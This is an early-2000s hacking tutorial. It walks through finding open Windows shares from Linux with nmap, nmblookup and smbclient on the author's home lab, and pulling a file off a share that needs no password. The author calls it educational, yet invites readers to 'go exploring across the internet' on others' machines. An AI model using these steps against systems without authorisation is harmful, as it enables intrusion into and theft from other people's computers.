Hacking Windows shares from Linux with Samba
A little while ago I did an article on breaking into Windows shares using an automated madirish.bat. If you're not familiar with that article, feel free to read up on Madirish.net (articles Madirish Tutorial 09 and Tutorial 10 in the 'Tech' section). In that article I showed how to use native windows diagnostic commands to browse around not only your local network, but also remote networks, to find open shares and access the resources in those shares. In this short piece I'll show you how to do the same thing from a Linux environment. The lynchpin to this operation is Samba, the Linux tool that allows Linux machines to play in Windows networks. If you don't have Samba installed, your going to need it (the client tools only, the server isn't necessary). If you don't know how to install Samba head over to www.Samba.org. If you still can't figure out how to install samba on your own computer you really don't have any business breaking into other people's computers :)
The first step in exploring remote shares is to find computers that are offering open shares. For this purpose I use NMAP. We'll start by scanning for computers offering an open port 139. If the port is filtered then we may have trouble, but if its open we should be good to begin exploring. Ports 137 and 139 are used by Windows for Netbios shares.
I'm going to begin by poking around my LAN (192.168.0.1-255). These are all reserved addresses in my home network so don't bother trying to use the exact IP's I use. There are three computers on the environment I'm playing in and one is deliberately set up with an insecure share. The network looks like this (although I'm sort of cheating here by already knowing what my target will look like, but this is for educational purposes ;):
192.169.0.1 Windows 2000 Pro - Primary Domain Ctrl. 192.168.0.2 Mandrake 8.1 Laptop (Me) 192.168.0.5 Windows ME (My Girlfriend's Computer)
Ok, so lets start by nmapping the whole shebang and looking for open port 139's.
[root@laptop /]# nmap -sS -O 192.168.0.1-6 -p 139 Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ ) Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port Interesting ports on (192.168.0.1): Port State Service 139/tcp open netbios-ssn Remote OS guesses: Windows Me or Windows 2000 RC1 through final release, Windows Millenium Edition v4.90.3000 The 1 scanned port on laptop.madirish.net (192.168.0.2) is: closed Interesting ports on (192.168.0.5): Port State Service 139/tcp open netbios-ssn Remote OS guesses: Windows Me or Windows 2000 RC1 through final release, Windows Millenium Edition v4.90.3000 Nmap run completed -- 6 IP addresses (3 hosts up) scanned in 53 seconds
Ok, so now I've got my two potential targets, 192.168.0.1 and 192.168.0.5 both have the correct port. The next stage is to find out what these machine's Netbios names are. Without this information we won't be able to request any share information from these computers (because Microsoft tries to make everything easy, even networking, and identifies computers on a network not by their IP address but by their 'name'). Ok, the syntax for requesting name information is 'nmblookup -A 111.111.111.111' with the appropriate IP address instead of the ones. The '-A' flag denotes a remote computer (a lot like the windows command 'nbtstat -A 111.111.111.111' although that identifies existing connections). Ok, so lets see what we can see, we'll start with the ME machine at 192.168.0.5:
[root@laptop /]# nmblookup -A 192.168.0.5 Looking up status of 192.168.0.5 GIRLFRIEND <00> - B <ACTIVE> WORKGROUP <00> - <GROUP> B <ACTIVE> GIRLFRIEND <03> - B <ACTIVE> GIRLFRIEND <20> - B <ACTIVE> WORKGROUP <1e> - <GROUP> B <ACTIVE> MADIRISH GIRL <03> - B <ACTIVE>
(Note that I've replaced some information since this is online and all). Ok, so now we've got the computer name, 'GIRLFRIEND'. We're going to need this to investigate shares. To do this we'll use the diagnostic program smbclient:
[root@laptop /]# smbclient -L\\GIRLFRIEND -I 192.168.0.5 added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224 Password: Sharename Type Comment --------- ---- ------- C Disk PRINTER$ Disk HP Printer HP DeskJet 820Cxi IPC$ IPC Remote Inter Process Communication Server Comment --------- ------- MADIRISH-DT GIRLFRIEND MADIRISH GIRL Workgroup Master --------- ------- WORKGROUP MADIRISH-DT
I entered 'none' for the password and it turned out that I could retrieve this list without a password. Use the '-N' flag on the smbclient command to suppress the password prompt. The interesting thing to note here is that there is all sorts of information about the PDC (Primary Domain Controller) MADIRISH-DT. This is the 'Browse Master' that holds all the Netbios names for the network. So the entire C drive is shared on this computer. We'll try to connect to the shared C drive (although I know its password protected). Notice my attempt will fail when I enter a bad password:
[root@laptop /]# smbclient //GIRLFRIEND/c -I 192.168.0.5 added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224 Password: tree connect failed: ERRSRV - ERRbadpw (Bad password - name/password pair in a Tree Connect or Session Setup are invalid.)
Since I know I'm not going to get any further on this computer, I'm going to switch my probes to MADIRISH-DT at 192.168.0.1. I'm going to repeat my command set to find out all the information I need:
[root@laptop \]$ nmblookup -A 192.168.0.1 Looking up status of 192.168.0.1 MADIRISH-DT <00> - B <ACTIVE> MADIRISH-DT <20> - B <ACTIVE> WORKGROUP <00> - <GROUP> B <ACTIVE> WORKGROUP <1e> - <GROUP> B <ACTIVE> MADIRISH-DT <03> - B <ACTIVE> MADIRISH-DT <6a> - B <ACTIVE> WORKGROUP <1d> - B <ACTIVE> MADIRISH-DT <87> - B <ACTIVE> ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> ADMINISTRATOR <03> - B <ACTIVE>
You'll notice that the entry labeled <03> is the user logged into the computer. I'll continue with (note the second flag is an upper case i, not a lower case L):
[root@laptop /]$ smbclient -L \\madirish-dt -I 192.168.0.1 -N added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224 Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager] Sharename Type Comment --------- ---- ------- IPC$ IPC Remote IPC share Disk ADMIN$ Disk Remote Admin C$ Disk Default share Server Comment --------- ------- MADIRISH-DT GIRLFRIEND MADIRISH GIRL Workgroup Master --------- ------- WORKGROUP MADIRISH-DT
Ok, lets see if we can't connect to the 'share' disk share. We use the same 'smbclient' command to do this, but with other arguments. What we're going to do is actually request a connection to the share. If this completes successfully our prompt will instantly change to:
smb>
At that point you can type '?' to get a list of commands, but smbclient functions a lot like ftp so all those commands will be viable. Lets go ahead and see what happens when we request access to this share:
[root@laptop /]# smbclient //madirish-dt/share -I 192.168.0.1 -N added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224 Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager] smb: \> dir . DA 0 Sat Mar 16 10:51:45 2002 .. DA 0 Sat Mar 16 10:51:45 2002 NewDoc.txt A 0 Sat Mar 16 10:48:32 2002 screenshot.jpg A 145878 Sat Mar 16 10:51:48 2002 51834 blocks of size 131072. 16437 blocks available smb: \>
And you'll notice I'm in :). At this point you could use 'put' or 'get' to push or pull files to and from the share. For instance, to grab NewDoc.txt (although its size is showing as '0' so I know its empty), I use:
[root@laptop /]# smbclient //madirish-dt/share -I 192.168.0.1 -N added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224 Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager] smb: \> get NewDoc.txt getting file NewDoc.txt of size 0 as NewDoc.txt (0.0 kb/s) (average 0.0 kb/s) smb: \> exit [root@laptop /]# ls -l NewDoc.txt -rw-r--r-- 1 root root 0 Mar 17 09:28 NewDoc.txt
And its just that easy, I've swiped NewDoc.txt off of the MADIRISH-DT server.
At this point you're probably wondering why I pick on Windows shares so often. The answer is that these targets abound. As high speed connections proliferate, more and more windows clients are coming on the internet. Very few people understand how to properly set up shares, and Windows doesn't really prompt users about improper configurations. Although Windows XP uses a more advanced architecture (its NT based at the core), it is even more difficult to set up a proper share on XP. Its far easier to set up a share and open it to everyone than actually customize the share with proper permissions. The fact that this article demonstrates how easy it is to intrude upon a poorly protected Windows share should serve as a warning.
Remember, I'm writing this article for educational purposes only. It is more than possible to use the information herein for legitimate purposes. Please remember, if you're going to use this information to go exploring across the internet, don't delete or destroy anything. People get concerned when they shut down their home computers and they get a 'Warning: 1 user is still connected', but when they find their tax information has been destroyed they call the cops.